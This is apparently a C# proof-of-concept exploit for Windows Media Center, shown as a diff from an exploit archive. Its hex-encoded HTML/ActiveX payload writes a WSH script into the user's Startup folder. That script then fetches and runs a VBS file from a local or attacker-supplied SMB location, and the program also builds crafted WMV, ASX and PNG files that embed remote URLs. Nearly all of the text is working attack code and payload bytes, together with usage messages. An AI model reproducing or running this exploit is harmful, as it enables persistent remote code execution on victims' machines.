68D396E276FA6E3E40B210BC42AC96D6BEA5E472D363EB62BC30DC0049A8BC0FD852286896FE058D404649CE5F72480126901B29EFF2DD1B2171518B970DF83B64E161778538E787E3A0880A6BB19AD555E535D8CD6AAAF67394A00E291402E0408E2525F676405FE89A589FDEF21214E3D63282017964A1F41F10A35E3A929293A9A6067306DEFBED88EFA2B46E2F66B77C6624366843156EAB67394A00E2CAA3534EF504F4A12B56081BE84AA6087EB17DBDB3B85311ED6B5B28332D9EFA2D6423514944FE96F895E7A4853420B62DE8991DD5907EF9385CED925786FA8009362781FB0A44C13534584D05AF433E496769AAB634110B1C4AF54CB7277A47EF7149ED9932B32F6D6AB00D8B0BE23A0900A6BB19AD555E535D8CD6AAAF67395F6A75D052803864E293E4F45F4FE85C8AA28F16A2FA151A6A7F8D2A86234740689CCA714DBF25AF06AF0CB14D015B23A207259B08662CE3545042DF7BE214C4C4D9E0B461DDAA6FFDA1FAB6739501A5007100C73E0BA912988DA82FE0F225ABE2CB65EF3DED4C10C53E4917E5292C821B1F2C81BD1451EC90BBED3607B5493ECB4FF0E59F5BE9C9156A59B92BD0AC33539ECD1EDF3783EECCDF8195E19420024DF9E07EC293B0888CF1B4AED9DBCCFC975D33678E409DBB23310888E2D43BE55BEEC2C87059EA6B3D68F3613370A994A1D8E822029AEC66B555794D76335AAABD9CE528038D1B63C57ED009AC5EA74A753533FA9A894EFD07A1208C0448AECC16359380807199BE8552589924CB5984021BEF083FDD539B65551FEB361B19EAAD9D902B67394A00E348475B41570A82B56DAD7A85A115BE298B54A5946C44FFFC0D02376581F1EE90B790A1E2D324CAA6145E9B5AB0CDBC4D0758990C2CF27276AAD9B6FD95D283DF6FFD342D77777CCF7DE411E2B67395F13C49401C26D1D6574944B846E96A9623ABA81557CD342EBCEDAB7A11A14284F10B91498A4B16235A2D6B6FA6267E87A28FD14362F6537B745F7DB2064466AE00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090080033B1E5CF1189F400A0C90349CB9E000000000000000B3206305BC9F44391D3DE3DB933D54080969800000000000100000011000000000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100000000000100"; + + + + string htmld1 = +"3C48544D4C3E3C424F4459206F6E6C6F61643D626C6F616428293E0D0A3C4F424A4543542049443D736D2057494454483D31204845494748543D3120434C41535349443D434C5349443A43344432443845302D443144442D313143452D393430462D3030383032393030343334373E0D0A3C504152414D204E414D453D2247726170685469746C65222056414C55453D220D0A5B53637269707446696C655D0D0A506174683D"; + string htmld2 = +"5C776D632E7662730D0A78222F3E0D0A3C504152414D204E414D453D2244617461536F7572636554797065222056414C55453D2231222F3E0D0A3C504152414D204E414D453D22436F756E746572436F756E74222056414C55453D2231222F3E0D0A3C504152414D204E414D453D22436F756E74657230303030312E50617468222056414C55453D225C50726F636573736F722830295C252050726F636573736F722054696D65222F3E0D0A3C504152414D204E414D453D22436F756E74657230303030312E53686F77222056414C55453D2231222F3E0D0A3C504152414D204E414D453D22436F756E74657230303030312E53656C6563746564222056414C55453D2231222F3E0D0A3C504152414D204E414D453D22436F756E74657230303030312E537461746973746963537461747573222056414C55453D2230222F3E0D0A3C504152414D204E414D453D22436F756E74657230303030312E44617461222056414C55453D2232312E393939350931352E37353934360932352E31313935320931322E36333934340931382E383739343809362E333939340932302E34333934390933382E3835333837393339363938343909322E313130393236323934383230373109392E35313934320931322E363339343409372E393539343109362E333939340931342E313939343509392E3531393432092D31222F3E0D0A3C504152414D204E414D453D2253656C65637465643A202573222056414C55453D225C50726F636573736F722830295C252050726F636573736F722054696D65222F3E0D0A3C2F4F424A4543543E0D0A3C6F626A6563742069643D7720636C61737369643D636C7369643A38383536463936312D333430412D313144302D413936422D3030433034464437303541322077696474683D31206865696768743D313E0D0A3C706172616D206E616D653D4C6F636174696F6E2076616C75653D7368656C6C3A706572736F6E616C3E3C2F6F626A6563743E0D0A3C7363726970743E0D0A66756E6374696F6E20626C6F61642829207B20747279207B20646F63203D20772E4C6F636174696F6E55524C2E746F537472696E6728292E746F4C6F7765724361736528293B207D20636174636828657229207B20207D0D0A7578203D202775736572732F273B206463203D20272F646F63756D656E7473273B20757831203D20646F632E696E6465784F66287578293B20757832203D20646F632E696E6465784F66286463293B20753D646F632E737562737472696E6728757831202B2075782E6C656E6774682C757832293B2075203D20756E6573636170652875293B20696620287520213D20272729207B200D0A747279207B20736D2E5361766541732827433A2F75736572732F27202B2075202B20272F417070446174612F526F616D696E672F4D6963726F736F66742F57696E646F77732F5374617274204D656E752F50726F6772616D732F537461727475702F776D632E777368272C31293B207D20636174636828657229207B207D20207D20207D0D0A3C2F7363726970743E3C2F424F44593E3C2F48544D4C3E"; + + string pngd = +"89504E470D0A1A0A0000000D49484452000000AE0000007A080600000026A368D7000000017352474200AECE1CE90000000467414D410000B18F0BFC6105000000097048597300000EC300000EC301C76FA864000004C349444154785EEDDA414EE33C1887F139C82C390D2BCEC282B3207114C451E006B3402C5025A44C5392A18D5FDBAF633B9D7FF458FA499F342975ECA7495A7DBFFEFCBE190035840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49840B49EBC3BD7D1ABE86C8787EB05F33BA7F990EFA19877BE3B898DAD7AF9CF7FBE3DB74D03CDE86CF5BFBD8D1C7F374D8BFF1327C18C7ADF7301CA6BF1C8CD7A7E1DD7C4D5C787EF388CC3BB58ED1915EB312C5E1C64FD018D6021AE17D3DDE5D1E93B232DCDA795BAF8FBDAFF95E2B624AC99E4FEAE2B164ACE9F9B0F6A7683DCF46D14526A120DCBBE1F3757AF792B15CC0CDC36D336F77B8E695A8DD9566960FC7FB9EF9F5110E77E5E68F6379A5D934DC76F3F6856BBF5FD1F93979C271BDAFE396DF2EDC8D1F15C2E7B57958CF3F8BCDBB62B82DE7ED09D7DCCC925B7681F0BD5E86C3F27C1D8F27C1DF793EFE9DE93FE7E10DB7D5D5D4231F6EEC1399DD9029846B3D2A349E7776A38C7979C259CB0AF7239843EE0A17DE210EF7E1973EC970CDAB56CD866C146EEB79A737CAFA86DFFEB9F69C19AE318FE4DA066BE9FF1BFF79B8F64F2E5513DC24DCF6F34E6D94F521E9BD8976B8C65C121FD6E0D8D35D660FE15AB7DBDADBDF16E176987774A36ACF67A558B8BE0FF6280CF4FBB83D846B2C42FE1931638B703BCCDBDE28E3CA5EBB3E4ED170ADBB8D35A7608DE2AFF7869B1CB517BC8564B8D6E4AAAF261B84DB63DEBE8D9A37BFBF78B8D6A34B38AFE5313FEBD329DCC66B43B84EDE8DAA5E1FA754B8D9350A1EA5CEBF4812AE6D47E19A8F0A9D7F4D9825C3CD3C2E04AFBDB88DEFE051C18A8467DC9F717A5FEBBD1A6F92251D6EEADFC3DF6E2FD77F7DB8C13E74541E6EEDA65C2BDCCA79C7372A0C611C45E7B4422E5CEB9795D37C938F09A33D846BFDAC547B2BDC22DC0EF34E6E548F75CAC8866B7DA08E1FDECFECEFBC7B08377235A9BAED6E116E8779E736CAFAF79E8F0CF97023735A8C70ED76116EFCE4F3B14DF12C63D924DCF6F3CE6F54870F7942389F305CFB4E703E8CD7EC255CEB447E8675E28BDF0897579D8DC26D3D6FD7464542E9B1A1AE70631FA679981FAADD847B64C4E21E8E7073E36241DCE11E359CB777A3ACE3621F941ABE7063F3F91EF6BAAD0FD7335AC5ED0B77B43602C7A3426E5C2C5C49B8A346F3F6861BBDD2377E64F0861B7F5C887D98FA865B74774DF0877B92BAFD1AC3FA72B275B827F5F3F6877B649E63DB5F19DCE1163F7BEF32DC59FAD9293DB9C2888EE3229055E1CED6CF3BDCA87488E1FF2F5032CF3C7FB847C19AA5E6EE0B37FFC5CF1EADD66065B8C075112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E24112E04DD0C7F01D6648D736D46368A0000000049454E44AE426082"; + string asxd = +"3C6173782076657273696F6E3D22322E30223E3C656E7472793E3C72656620687265663D22312E776D76222F3E3C6475726174696F6E2076616C75653D2230303A30303A3032222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22312E706E67222F3E3C6475726174696F6E2076616C75653D2230303A30303A3033222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22322E776D76222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22312E706E67222F3E3C6475726174696F6E2076616C75653D2230303A30303A3033222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22322E776D76222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22312E706E67222F3E3C6475726174696F6E2076616C75653D2230303A30303A3033222F3E3C2F656E7472793E3C656E7472793E3C72656620687265663D22322E776D76222F3E3C2F656E7472793E3C2F6173783E"; + string default_URL = +"660069006C0065003A002F002F0063003A002F00700072006F006700720061006D0064006100740061002F0077006D0063002E00680074006D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"; + + string default_smbP = +"5C5C3132372E302E302E315C63245C70726F6772616D64617461"; + + string tmpPath = Path.GetTempPath(); + + string prof = +Environment.GetFolderPath(Environment.SpecialFolder.UserProfile); + + string videos = prof + "\\Videos"; + + int URL_Max = 258; + + + string[] cargs = Environment.GetCommandLineArgs(); + + + + + int a = cargs.Length; + + + + if (a <= 1) { Console.WriteLine(welcome); + + Console.ForegroundColor = ConsoleColor.Blue; + + Console.WriteLine(howto); + + Console.ForegroundColor = ConsoleColor.Gray; + + + if (!Directory.Exists(exeDir + "\\PoC1")) { + Directory.CreateDirectory(exeDir + "\\PoC1"); + } + + if (Directory.Exists("C:\\programdata")) + { + StreamWriter fw = File.CreateText(tmpPath + +"\\wmc0001.h"); + + fw.Write(htmld1); + fw.Write(default_smbP); + fw.Write(htmld2); + fw.Close(); + + FileStream fs0 = File.OpenRead(tmpPath + "\\wmc0001.h"); + + String ax = ""; + + + byte[] b0 = new byte[fs0.Length]; + + UTF8Encoding temp0 = new UTF8Encoding(false); + + while (fs0.Read(b0, 0, b0.Length) > 0) + { + ax = ax + temp0.GetString(b0); + } + + + String bx = ax.ToString(); + String cx = ""; + + byte[] b02 = new byte[fs0.Length / 2]; + for (int i = 0; i < fs0.Length; i += 2) + { + cx = bx.Substring(i, 2); + b02[i / 2] = Convert.ToByte(cx, 16); + } + + File.WriteAllBytes("c:\\programdata\\wmc.htm", b02); + } + StreamWriter fw1 = File.CreateText(tmpPath + +"\\default0001.h"); + + fw1.Write(wmvs); + fw1.Write(default_URL); + fw1.Write(wmve1); + fw1.Write(t1); + fw1.Write(wmve2); + fw1.Close(); + + FileStream fs1 = File.OpenRead(tmpPath + "\\default0001.h"); + + String ax1 = ""; + + + byte[] b = new byte[fs1.Length]; + + UTF8Encoding temp = new UTF8Encoding(false); + + while (fs1.Read(b, 0, b.Length) > 0) + { + ax1 = ax1 + temp.GetString(b); + } + + + String bx1 = ax1.ToString(); + String cx1 = ""; + + byte[] b2 = new byte[fs1.Length / 2]; + for (int i = 0; i < fs1.Length; i += 2) + { + cx1 = bx1.Substring(i, 2); + b2[i / 2] = Convert.ToByte(cx1, 16); + } + + File.WriteAllBytes(videos + "\\wmc0001.wmv", b2); + + Console.WriteLine("\n\n\n\n Done! 'wmc0001.wmv' created +on your 'Videos' folder; 'wmc.htm' created on your programdata folder; +\n Upon successfully testing this item a WSH file is dropped to your +startup folder. \n Place a custom 'wmc" + "." + " vbs' file on your +programdata folder because it will be retrieved on next boot."); + + Environment.Exit(0); } + + + else if (a == 2 || a < 4) { Console.ForegroundColor = +ConsoleColor.Red; Console.WriteLine("\n\n\n\n Failed. You need to +provide all required arguments; Try again!"); Environment.Exit(0); } + + + else + { + + // POC 2 + + Console.WriteLine(welcome); + + Console.ForegroundColor = ConsoleColor.Blue; + + Console.WriteLine(howto); + + Console.ForegroundColor = ConsoleColor.Gray; + + + + string strsearch = "| "; + + string cxs = string.Join(strsearch, cargs); + + + + int c1 = cxs.IndexOf(strsearch, 0); + + int c2 = cxs.IndexOf(strsearch, c1 + 1); + + int c3 = cxs.IndexOf(strsearch, c2 + 1); + + + + + + string carg1 = cxs.Substring(c1 + strsearch.Length, +c2 - c1 - strsearch.Length); + + string carg2 = cxs.Substring(c2 + strsearch.Length, +c3 - c2 - strsearch.Length); + + string carg3 = cxs.Substring(c3 + strsearch.Length); + + + if (carg1.Length > URL_Max || carg2.Length > URL_Max) + { + Console.ForegroundColor = ConsoleColor.Red; +Console.WriteLine("\n\n\n\n Error: The URLs cannot exceed 258 chars. Try +again!"); + + Console.ForegroundColor = ConsoleColor.Gray; + } + + else + { + int cx1 = carg1.Length; + int cx2 = carg2.Length; + + while (cx1 < URL_Max) + { + carg1 = carg1 + "*"; + cx1++; + } + + while (cx2 < URL_Max) + { + carg2 = carg2 + "*"; + cx2++; + } + } + + + if (!Directory.Exists(exeDir + "\\PoC2")) + { + Directory.CreateDirectory(exeDir + "\\PoC2"); + } + + + + byte[] ba1 = Encoding.Default.GetBytes(carg1); + + string hex1 = BitConverter.ToString(ba1); + + hex1 = hex1.Replace("-", "00"); // transform ASCII +HEX String into Unicode HEX String + + hex1 = hex1.Replace("2A", "00"); + + string url_remote = hex1 + "00"; // appends null +byte to the last byte + + + byte[] ba2 = Encoding.Default.GetBytes(carg2); + + string hex2 = BitConverter.ToString(ba2); + + hex2 = hex2.Replace("-", "00"); + + hex2 = hex2.Replace("2A", "00"); + + string url_local = hex2 + "00"; + + + byte[] ba3 = Encoding.Default.GetBytes(carg3); + + string hex3 = BitConverter.ToString(ba3); + + string smb_path = hex3.Replace("-", ""); + + + if (Directory.Exists(exeDir + "\\PoC2")) + { + StreamWriter fw4 = File.CreateText(tmpPath + +"\\wmc0002.h"); + + fw4.Write(htmld1); + fw4.Write(smb_path); + fw4.Write(htmld2); + fw4.Close(); + + FileStream fs4 = File.OpenRead(tmpPath + +"\\wmc0002.h"); + + String ax4 = ""; + + + byte[] b4 = new byte[fs4.Length]; + + UTF8Encoding temp4 = new UTF8Encoding(false); + + while (fs4.Read(b4, 0, b4.Length) > 0) + { + ax4 = ax4 + temp4.GetString(b4); + } + + + String bx4 = ax4.ToString(); + String cx4 = ""; + + byte[] b04 = new byte[fs4.Length / 2]; + for (int i = 0; i < fs4.Length; i += 2) + { + cx4 = bx4.Substring(i, 2); + b04[i / 2] = Convert.ToByte(cx4, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\wmc.htm", b04); + + + + StreamWriter fw5 = File.CreateText(tmpPath + +"\\asx0002.h"); + + fw5.Write(asxd); + + fw5.Close(); + + FileStream fs5 = File.OpenRead(tmpPath + +"\\asx0002.h"); + + String ax5 = ""; + + + byte[] b5 = new byte[fs5.Length]; + + UTF8Encoding temp5 = new UTF8Encoding(false); + + while (fs5.Read(b5, 0, b5.Length) > 0) + { + ax5 = ax5 + temp5.GetString(b5); + } + + + String bx5 = ax5.ToString(); + String cx5 = ""; + + byte[] b05 = new byte[fs5.Length / 2]; + for (int i = 0; i < fs5.Length; i += 2) + { + cx5 = bx5.Substring(i, 2); + b05[i / 2] = Convert.ToByte(cx5, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\wmc" + "." ++ "asx", b05); + + + + StreamWriter fw6 = File.CreateText(tmpPath + +"\\png0002.h"); + + fw6.Write(pngd); + + fw6.Close(); + + FileStream fs6 = File.OpenRead(tmpPath + +"\\png0002.h"); + + String ax6 = ""; + + + byte[] b6 = new byte[fs6.Length]; + + UTF8Encoding temp6 = new UTF8Encoding(false); + + while (fs6.Read(b6, 0, b6.Length) > 0) + { + ax6 = ax6 + temp6.GetString(b6); + } + + + String bx6 = ax6.ToString(); + String cx6 = ""; + + byte[] b06 = new byte[fs6.Length / 2]; + for (int i = 0; i < fs6.Length; i += 2) + { + cx6 = bx6.Substring(i, 2); + b06[i / 2] = Convert.ToByte(cx6, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\1.png", b06); + + + + StreamWriter fw7 = File.CreateText(tmpPath + +"\\wmv0001.h"); + + fw7.Write(wmvs); + fw7.Write(url_remote); + fw7.Write(wmve1); + fw7.Write(t1); + fw7.Write(wmve2); + + fw7.Close(); + + FileStream fs7 = File.OpenRead(tmpPath + +"\\wmv0001.h"); + + String ax7 = ""; + + + byte[] b7 = new byte[fs7.Length]; + + UTF8Encoding temp7 = new UTF8Encoding(false); + + while (fs7.Read(b7, 0, b7.Length) > 0) + { + ax7 = ax7 + temp7.GetString(b7); + } + + + String bx7 = ax7.ToString(); + String cx7 = ""; + + byte[] b07 = new byte[fs7.Length / 2]; + for (int i = 0; i < fs7.Length; i += 2) + { + cx7 = bx7.Substring(i, 2); + b07[i / 2] = Convert.ToByte(cx7, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\1.wmv", b07); + + + StreamWriter fw8 = File.CreateText(tmpPath + +"\\wmv0002.h"); + + fw8.Write(wmvs); + fw8.Write(url_local); + fw8.Write(wmve1); + fw8.Write(t2); + fw8.Write(wmve2); + + fw8.Close(); + + FileStream fs8 = File.OpenRead(tmpPath + +"\\wmv0002.h"); + + String ax8 = ""; + + + byte[] b8 = new byte[fs8.Length]; + + UTF8Encoding temp8 = new UTF8Encoding(false); + + while (fs8.Read(b8, 0, b8.Length) > 0) + { + ax8 = ax8 + temp8.GetString(b8); + } + + + String bx8 = ax8.ToString(); + String cx8 = ""; + + byte[] b08 = new byte[fs8.Length / 2]; + for (int i = 0; i < fs8.Length; i += 2) + { + cx8 = bx8.Substring(i, 2); + b08[i / 2] = Convert.ToByte(cx8, 16); + } + + File.WriteAllBytes(exeDir + "\\PoC2\\2.wmv", b08); + + + Console.WriteLine("\n\n\n\n Done! All files +written to 'PoC2' folder. Begin by opening the 'wmc" + "." + " a s x' +file with Windows Media Center. \n If it succeeds a WSH file is dropped +to startup folder and will retrieve and run a 'wmc'" + "." + " vbs' file +from the SMB location you provided."); + + Environment.Exit(0); + + } + } + + } + } +} \ No newline at end of file diff --git a/exploits/windows/remote/48194.txt b/exploits/windows/remote/48194.txt new file mode 100644 index 